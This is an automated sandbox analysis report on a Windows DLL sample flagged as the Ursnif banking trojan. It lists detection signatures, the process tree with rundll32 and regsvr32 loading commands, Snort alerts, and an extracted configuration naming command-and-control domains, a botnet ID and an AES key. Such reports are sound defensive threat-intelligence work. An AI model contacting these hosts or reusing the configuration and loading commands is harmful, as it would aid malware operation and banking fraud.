Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pzG0rkIchr.dll

Overview

General Information

Sample Name:pzG0rkIchr.dll
Analysis ID:752975
MD5:d6ef4778f7dc9c31a0a2a989ef42d2fd
SHA1:5dad8394ef37d5a006674589754f7a3187d303b1
SHA256:54de1f2c26a63a8f6b7f8d5de99f8ebd4093959ab07f027db1985d0652258736
Tags:exeLDR4
Infos:

Detection

Ursnif
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Ursnif
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Performs DNS queries to domains with low reputation
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Tries to load missing DLLs
Checks if the current process is being debugged
Registers a DLL
Launches processes in debugging mode, may be used to hinder debugging
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 1556 cmdline: loaddll64.exe "C:\Users\user\Desktop\pzG0rkIchr.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
    • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1076 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 5268 cmdline: rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 2356 cmdline: regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dll MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 5264 cmdline: rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6044 cmdline: rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,ItsnPq5v MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 5572 cmdline: C:\Windows\system32\WerFault.exe -u -p 6044 -s 276 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 6136 cmdline: rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,QlqYo259k MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 5404 cmdline: C:\Windows\system32\WerFault.exe -u -p 6136 -s 304 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
      • WerFault.exe (PID: 680 cmdline: C:\Windows\system32\WerFault.exe -u -p 6136 -s 304 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"c2_domain": ["https://gigimas.xyz", "https://reaso.xyz"], "botnet": "202206061", "aes key": "eq2opFFpGzpd2p9t", "sleep time": "20", "request time": "30", "host keep time": "120", "host shift time": "120"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: loaddll64.exe PID: 1556JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
    Process Memory Space: regsvr32.exe PID: 2356JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
      Process Memory Space: rundll32.exe PID: 5268JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
        Process Memory Space: rundll32.exe PID: 5264JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.48.8.8.864906532039645 11/24/22-05:22:35.810533
          SID:2039645
          Source Port:64906
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.861007532039645 11/24/22-05:20:02.978332
          SID:2039645
          Source Port:61007
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.861124532039645 11/24/22-05:21:04.451832
          SID:2039645
          Source Port:61124
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.859444532039645 11/24/22-05:21:34.871041
          SID:2039645
          Source Port:59444
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.855570532039645 11/24/22-05:22:05.359167
          SID:2039645
          Source Port:55570
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.860686532039645 11/24/22-05:20:33.386749
          SID:2039645
          Source Port:60686
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.859446532039645 11/24/22-05:23:06.390786
          SID:2039645
          Source Port:59446
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: pzG0rkIchr.dllVirustotal: Detection: 57%Perma Link
          Source: pzG0rkIchr.dllReversingLabs: Detection: 73%
          Antivirus detection for URL or domain
          Source: https://reaso.xyzAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: gigimas.xyzVirustotal: Detection: 14%Perma Link
          Source: https://gigimas.xyzVirustotal: Detection: 11%Perma Link
          Source: 4.3.rundll32.exe.17b359400d0.0.raw.unpackMalware Configuration Extractor: Ursnif {"c2_domain": ["https://gigimas.xyz", "https://reaso.xyz"], "botnet": "202206061", "aes key": "eq2opFFpGzpd2p9t", "sleep time": "20", "request time": "30", "host keep time": "120", "host shift time": "120"}
          Source: pzG0rkIchr.dllStatic PE information: certificate valid
          Source: pzG0rkIchr.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32.pdb source: WerFault.exe, 0000000D.00000003.375083510.000001EA8FE94000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernelbase.pdb0 source: WerFault.exe, 0000000D.00000003.359316080.000001EA8F2F7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.370137520.000001EA8F2F7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bcryptprimitives.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: oleaut32.pdb"V source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernelbase.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: shcore.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: combase.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: elbase.pdb source: WerFault.exe, 0000000D.00000002.379074933.000001EA8D552000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.370270156.000001EA8D563000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: win32u.pdb8 source: WerFault.exe, 0000000D.00000003.375083510.000001EA8FE94000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msctf.pdb source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32full.pdb8 source: WerFault.exe, 0000000D.00000003.375083510.000001EA8FE94000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32.pdb8 source: WerFault.exe, 0000000D.00000003.375083510.000001EA8FE94000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: user32.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.375077557.000001EA8FE90000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rpcrt4.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: imagehlp.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ntdll.pdb source: WerFault.exe, 0000000D.00000003.370270156.000001EA8D563000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.373102112.000001EA8F2EA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.359276516.000001EA8F2EA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernel32.pdb source: WerFault.exe, 0000000D.00000003.371722395.000001EA8F2F1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.370270156.000001EA8D563000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.359287144.000001EA8F2F1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dwmapi.pdb6V source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000D.00000003.359149665.000001EA8F2E4000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.370270156.000001EA8D563000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.359079833.000001EA8F379000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcrt.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msctf.pdb!V source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ntdll.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: win32u.pdb source: WerFault.exe, 0000000D.00000003.375083510.000001EA8FE94000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000000D.00000003.375083510.000001EA8FE94000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernel32.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: user32.pdb8 source: WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000D.00000003.375045922.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375091188.000001EA8FE97000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000000D.00000003.373102112.000001EA8F2EA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.359276516.000001EA8F2EA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000000D.00000003.359316080.000001EA8F2F7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.370137520.000001EA8F2F7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.375037408.000001EA8FE91000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000000D.00000003.371722395.000001EA8F2F1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.359287144.000001EA8F2F1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: imm32.pdb source: WerFault.exe, 0000000D.00000003.375077557.000001EA8FE90000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130EFB70 FindFirstFileExA,0_2_00007FFC130EFB70
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130EFB70 FindFirstFileExA,3_2_00007FFC130EFB70
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130EFB70 FindFirstFileExA,8_2_00007FFC130EFB70

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 185.250.148.35 443Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeDomain query: gigimas.xyz
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:61007 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:60686 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:61124 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:59444 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:55570 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:64906 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:59446 -> 8.8.8.8:53
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\System32\regsvr32.exeDNS query: gigimas.xyz
          Source: C:\Windows\System32\regsvr32.exeDNS query: gigimas.xyz
          Source: C:\Windows\System32\regsvr32.exeDNS query: gigimas.xyz
          Source: C:\Windows\System32\regsvr32.exeDNS query: gigimas.xyz
          Source: Joe Sandbox ViewASN Name: FIRSTDC-ASRU FIRSTDC-ASRU
          Source: Joe Sandbox ViewIP Address: 185.250.148.35 185.250.148.35
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: pzG0rkIchr.dllString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: WerFault.exe, 0000000D.00000002.379355430.000001EA8F2E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: WerFault.exe, 0000000D.00000002.379355430.000001EA8F2E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: pzG0rkIchr.dllString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
          Source: pzG0rkIchr.dllString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
          Source: pzG0rkIchr.dllString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
          Source: pzG0rkIchr.dllString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
          Source: pzG0rkIchr.dllString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
          Source: pzG0rkIchr.dllString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
          Source: pzG0rkIchr.dllString found in binary or memory: http://ocsp.comodoca.com0
          Source: pzG0rkIchr.dllString found in binary or memory: http://ocsp.sectigo.com0
          Source: loaddll64.exe, 00000000.00000003.631018067.0000020164340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641761210.00000000021BD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641543041.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357258070.0000017B374A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.357488590.00000201A4290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz
          Source: regsvr32.exe, 00000003.00000003.466330233.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.595788178.0000000000815000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641484903.0000000000813000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596407001.0000000000813000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.466249755.00000000007A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/
          Source: regsvr32.exe, 00000003.00000003.466330233.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596506826.000000000078D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/index.html
          Source: regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/index.html5F
          Source: regsvr32.exe, 00000003.00000003.466312748.00000000007DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/index.html9Pu/Jl
          Source: regsvr32.exe, 00000003.00000002.641214444.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596466270.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531265696.00000000007C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/index.htmlT
          Source: regsvr32.exe, 00000003.00000002.641004710.0000000000785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz/index.htmlm
          Source: regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz:443/index.html
          Source: regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyz:443/index.htmlY_
          Source: regsvr32.exe, 00000003.00000002.641761210.00000000021BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gigimas.xyzhttps://reaso.xyz
          Source: loaddll64.exe, 00000000.00000003.631032238.0000020164342000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641554871.00000000020E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357262173.0000017B374A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.357492545.00000201A4292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://http://Mozilla/5.0
          Source: regsvr32.exe, 00000003.00000002.641761210.00000000021BD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641543041.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357258070.0000017B374A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.357488590.00000201A4290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reaso.xyz
          Source: pzG0rkIchr.dllString found in binary or memory: https://sectigo.com/CPS0
          Source: unknownDNS traffic detected: queries for: gigimas.xyz

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Yara detected Ursnif
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 1556, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2356, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5264, type: MEMORYSTR

          E-Banking Fraud

          barindex
          Yara detected Ursnif
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 1556, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2356, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5264, type: MEMORYSTR
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6044 -s 276
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000201640C37E00_2_00000201640C37E0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000201640C6DF00_2_00000201640C6DF0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000201640CA9180_2_00000201640CA918
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000201640C45400_2_00000201640C4540
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000201640C56380_2_00000201640C5638
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000201640C204C0_2_00000201640C204C
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000201640C9D6C0_2_00000201640C9D6C
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000201640C34A40_2_00000201640C34A4
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000201640C31C00_2_00000201640C31C0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000201640C3CD80_2_00000201640C3CD8
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000201640C7FD40_2_00000201640C7FD4
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E58400_2_00007FFC130E5840
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E6D500_2_00007FFC130E6D50
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E9BA00_2_00007FFC130E9BA0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E83C00_2_00007FFC130E83C0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130F68080_2_00007FFC130F6808
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E68200_2_00007FFC130E6820
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130FF2900_2_00007FFC130FF290
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E42A00_2_00007FFC130E42A0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E76E00_2_00007FFC130E76E0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E1B100_2_00007FFC130E1B10
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130FB3700_2_00007FFC130FB370
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130FB9B00_2_00007FFC130FB9B0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130F75E00_2_00007FFC130F75E0
